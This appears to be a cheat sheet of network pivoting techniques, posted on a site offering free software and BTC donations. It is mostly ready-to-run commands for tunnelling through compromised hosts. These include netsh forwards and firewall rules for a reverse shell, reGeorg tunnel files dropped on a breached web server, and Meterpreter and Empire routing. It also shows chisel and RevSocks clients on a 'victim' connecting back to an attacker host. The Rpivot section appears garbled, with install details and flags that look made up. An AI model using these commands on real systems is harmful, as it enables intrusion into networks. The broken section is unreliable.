Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

Network Pivoting Techniques

groot5t1

Network Pivoting Techniques

Summary

SOCKS Compatibility Table
Windows netsh Port Forwarding
SSH
SOCKS Proxy
Local Port Forwarding
Remote Port Forwarding
Proxychains
Graftcp
Web SOCKS - reGeorg
Web SOCKS - pivotnacci
Metasploit
sshuttle
chisel
SharpChisel
gost
Rpivot
RevSocks
plink
ngrok
Capture a network trace with builtin tools
Basic Pivoting Types
References

SOCKS Compatibility Table

| SOCKS Version | TCP | UDP | IPv4 | IPv6 | Hostname |
|---------------|-----|-----|------|------|----------|
| SOCKS v4 | ✅ | ❌ | ✅ | ❌ | ❌ |
| SOCKS v4a | ✅ | ❌ | ✅ | ❌ | ✅ |
| SOCKS v5 | ✅ | ✅ | ✅ | ✅ | ✅ |

Windows netsh Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110

Forward the port 4545 for the reverse shell, and the 80 for the HTTP server

netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80

Correctly open the port on the machine

netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545

listenaddress – is a local IP address waiting for a connection.
listenport – local listening TCP port (the connection is waited on it).
connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
connectport – is a TCP port to which the connection from listenport is forwarded to.

SSH

SOCKS Proxy

ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]

-f : ssh in background
-N : do not execute a remote command

Cool Tip: Konami SSH Port forwarding

[ENTER] + [~C]
-D 1090

Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 root@10.11.0.32

Proxychains

Config file: /etc/proxychains.conf

[ProxyList]
socks4 localhost 8080

Set the SOCKS4 proxy:

proxychains nmap -sT 192.168.5.6

Graftcp

A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy.

⚠ Same as proxychains, with another mechanism to "proxify" which allows Go applications.

Create a SOCKS5, using Chisel or another tool and forward it through SSH

# Attacker
ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS

# VPS
./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse 

# Victim 1
./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks

Run graftcp and specify the SOCKS5

graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
graftcp ./nuclei -u http://172.16.1.24

Simple configuration file for graftcp:

listen = :2233
loglevel = 1
socks5 = 127.0.0.1:1080
# socks5_username = SOCKS5USERNAME
# socks5_password = SOCKS5PASSWORD
select_proxy_mode = auto

Web SOCKS - reGeorg

reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Drop one of the following files on the server:

tunnel.ashx
tunnel.aspx
tunnel.js
tunnel.jsp
tunnel.nosocket.php
tunnel.php
tunnel.tomcat.5.jsp

Command

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

Optional arguments:

-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The URL containing the tunnel script
-v , --verbose Verbose output [INFO|DEBUG]

Web SOCKS - pivotnacci

pivotnacci, a tool to make SOCKS connections through HTTP agents.

Installation

pip3 install pivotnacci

Command

pivotnacci https://domain.com/agent.php --password "s3cr3t"
pivotnacci https://domain.com/agent.php --polling-interval 2000

Metasploit

Meterpreter list active port forwards

portfwd list

Add port forwards

portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

Delete port forwards

portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush

Use Meterpreter's autoroute script

run autoroute -s 192.168.15.0/24

Meterpreter view available networks

run autoroute -p

Meterpreter add/delete route

route add 192.168.14.0 255.255.255.0 3 
route delete 192.168.14.0 255.255.255.0 3 
# Meterpreter delete all routes
route flush

Empire

(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost 10.10.10.10
(Empire) > run

sshuttle

Transparent proxy server that works as a poor man's VPN. Forwards over ssh.

Doesn't require admin.
Works with Linux and MacOS.
Supports DNS tunneling.

Installation

pacman -Sy sshuttle
apt-get install sshuttle

Command

sshuttle -vvr user@10.10.10.10 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24

Using a private key

sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"

Exclude networks

# -x == exclude some network to not transmit over the tunnel
# -x x.x.x.x.x/24

chisel

go get -v github.com/jpillora/chisel

Start the server

./chisel server --reverse --port 8080

Start the client

./chisel client example.com:8080 R:localhost:8000:8000

SharpChisel

A .NET implementation of chisel.

Commands

Server: SharpChisel.exe server -p 8080
Client: SharpChisel.exe client -server <serverIP>:8080 -reverse -r localhost:8000:8000

gost

Go-based tunneling application that can help you create a SOCKS5 proxy.

go get -u github.com/ginuerzh/gost

Command

gost -L=:8080 -P=10.0.0.1:8080
gost -L=:8080 -F=ssh://user:password@hostname:port

Rpivot

go get github.com/secureworks/rpivot

Commands

rpivot -h 
rpivot -p 
rpivot -i 10.0.0.1:22

RevSocks

RevSocks is a reverse SOCKS proxy.

Usage

On the attacker machine:
```
rev-socks -l [listening_port]
```

On the victim machine:

rev-socks -r [attacker_ip] -p [attacker_port]

plink

A tool for executing commands on remote Windows hosts over SSH.

Usage

plink.exe -ssh -L 8080:127.0.0.1:80 user@host

ngrok

Create a tunnel

ngrok tcp 22

Run a web server

ngrok http 80

Capture a network trace with builtin tools

Windows

Wireshark: GUI application for capturing packets.
Netsh: use netsh trace start capture=yes and netsh trace stop.

Linux

tcpdump: command-line packet analyzer.
```
tcpdump -i any -s 0 -w capture.pcap
```

Basic Pivoting Types

Local Pivoting: Involves accessing an internal network resource directly from the compromised host.
Remote Pivoting: Using the compromised machine to connect to the target network.
VPN Pivoting: Creating a VPN connection to route traffic through a compromised host.

References

This guide aims to provide a concise overview of various techniques and tools for network pivoting. For detailed documentation, please refer to the respective project repositories or manuals.

📱

Download Now—Top Software, No Cost!